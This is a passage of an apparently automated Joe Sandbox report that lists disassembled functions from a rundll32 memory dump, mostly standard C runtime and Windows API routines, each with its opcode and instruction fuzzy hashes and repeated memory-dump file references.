                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 289641511-0
                                                                                                          • Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
                                                                                                          • Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
                                                                                                          • Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
                                                                                                          • Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003303D, Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 10033049
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __amsg_exit.LIBCMT ref: 10033069
                                                                                                          • __lock.LIBCMT ref: 10033079
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 10033096
                                                                                                          • InterlockedIncrement.KERNEL32(00BD1600), ref: 100330C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271482742-0
                                                                                                          • Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
                                                                                                          • Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
                                                                                                          • Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
                                                                                                          • Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043707, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Fputc$H_prolog3_
                                                                                                          • String ID:
                                                                                                          • API String ID: 2569218679-3916222277
                                                                                                          • Opcode ID: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
                                                                                                          • Instruction ID: 327ff4da5823006f03605dc28747a7ba7b3d1cf190d8e7353a19ee1d8cd02c88
                                                                                                          • Opcode Fuzzy Hash: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
                                                                                                          • Instruction Fuzzy Hash: 74515CB6A046489BCB29CBA4C8919DEB7B5EF48310F31D539F552E7291EF70B808CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10028683, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                            • Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100286CC
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 100286DC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                          • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                          • API String ID: 3274081130-63838506
                                                                                                          • Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
                                                                                                          • Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
                                                                                                          • Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
                                                                                                          • Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10037AE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ___BuildCatchObject.LIBCMT ref: 10037AF8
                                                                                                            • Part of subcall function 10037A53: ___BuildCatchObjectHelper.LIBCMT ref: 10037A89
                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 10037B0F
                                                                                                          • ___FrameUnwindToState.LIBCMT ref: 10037B1D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2163707966-1018135373
                                                                                                          • Opcode ID: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
                                                                                                          • Instruction ID: f623d6fd13c583f27d9dc74078cf60041b57e54907eb0ea25ac4e83ce510980d
                                                                                                          • Opcode Fuzzy Hash: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
                                                                                                          • Instruction Fuzzy Hash: 1301E475001109BFDF239E51CC41EAB7FAAFF08392F108014BD1C19121D736E9A1EBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003B6EA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                          • Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
                                                                                                          • Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
                                                                                                          • Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
                                                                                                          • Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043F42, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043F49
                                                                                                            • Part of subcall function 1001E9D0: _strlen.LIBCMT ref: 1001E9EF
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043F66
                                                                                                            • Part of subcall function 10043EBB: std::runtime_error::runtime_error.LIBCPMT ref: 10043EC6
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043F74
                                                                                                            • Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F
                                                                                                          Strings
                                                                                                          • invalid string position, xrefs: 10043F4E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionException@8H_prolog3RaiseThrow_strlenstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                                                                                          • String ID: invalid string position
                                                                                                          • API String ID: 843739861-1799206989
                                                                                                          • Opcode ID: 45ad777bced333e79dc8783b5ddc33aee8a57e63d6a6dab2f02a1dc112f26aec
                                                                                                          • Instruction ID: 29482f66c8a5f8716b1ced5184e44cdebd8c398cac92a99365ce02766c2dbf89
                                                                                                          • Opcode Fuzzy Hash: 45ad777bced333e79dc8783b5ddc33aee8a57e63d6a6dab2f02a1dc112f26aec
                                                                                                          • Instruction Fuzzy Hash: 6FD0127580004D9ADB05DBD0CC55EDE7378EB14311F541835B301EA041DF747A49C658
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10003190, Relevance: 6.4, APIs: 5, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100031BF
                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100031EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
                                                                                                          • Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
                                                                                                          • Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
                                                                                                          • Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043370, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10043377
                                                                                                          • _fgetc.LIBCMT ref: 100434AD
                                                                                                            • Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3
                                                                                                          • _memcpy_s.LIBCMT ref: 10043472
                                                                                                          • _ungetc.LIBCMT ref: 100434F8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 9762108-0
                                                                                                          • Opcode ID: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
                                                                                                          • Instruction ID: 13a944e20a8a26727cade03676e391ccd69925211a3dd35b2a339be84363c332
                                                                                                          • Opcode Fuzzy Hash: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
                                                                                                          • Instruction Fuzzy Hash: CF515C76A006089FCB15DBB4C8919DEB7B9FF48210F70953AE552E7191EE60F908CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10044EAE, Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __flush.LIBCMT ref: 10044F72
                                                                                                          • __fileno.LIBCMT ref: 10044F92
                                                                                                          • __locking.LIBCMT ref: 10044F99
                                                                                                          • __flsbuf.LIBCMT ref: 10044FC4
                                                                                                            • Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24
                                                                                                            • Part of subcall function 10032DE1: __decode_pointer.LIBCMT ref: 10032DEC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                          • String ID:
                                                                                                          • API String ID: 3240763771-0
                                                                                                          • Opcode ID: 956221b4076386118c712c8f64a0eb647298e6b25e76d36a604d25e1bab44899
                                                                                                          • Instruction ID: f2cbb9fbd7bb741866626b2388375d2bcd999be80ff2815986012e88e7b340f8
                                                                                                          • Opcode Fuzzy Hash: 956221b4076386118c712c8f64a0eb647298e6b25e76d36a604d25e1bab44899
                                                                                                          • Instruction Fuzzy Hash: 48418F35A00605DFDB15CFAA888099EB7F6EF80360F328639E855D7580EB71EE45CB48
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003EEC4, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003EEF8
                                                                                                          • __isleadbyte_l.LIBCMT ref: 1003EF2C
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EF5D
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EFCB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3058430110-0
                                                                                                          • Opcode ID: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
                                                                                                          • Instruction ID: 26013823be584ed4b010159d5efc2338de830fada2216c2f4930337caeab7791
                                                                                                          • Opcode Fuzzy Hash: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
                                                                                                          • Instruction Fuzzy Hash: 52318931A002D6EFDB12DF64C880AAA7BE5EF41352F1286A9F4648F1E1D770AD40DB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B564, Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __msize_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1288803200-0
                                                                                                          • Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
                                                                                                          • Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
                                                                                                          • Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
                                                                                                          • Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100210FF, Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$__cftof
                                                                                                          • String ID:
                                                                                                          • API String ID: 887240167-0
                                                                                                          • Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
                                                                                                          • Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
                                                                                                          • Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
                                                                                                          • Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10023180, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 100231B0
                                                                                                          • LockResource.KERNEL32(00000000), ref: 100231C2
                                                                                                          • FreeResource.KERNEL32(00000000), ref: 10023210
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1078018258-0
                                                                                                          • Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
                                                                                                          • Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
                                                                                                          • Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
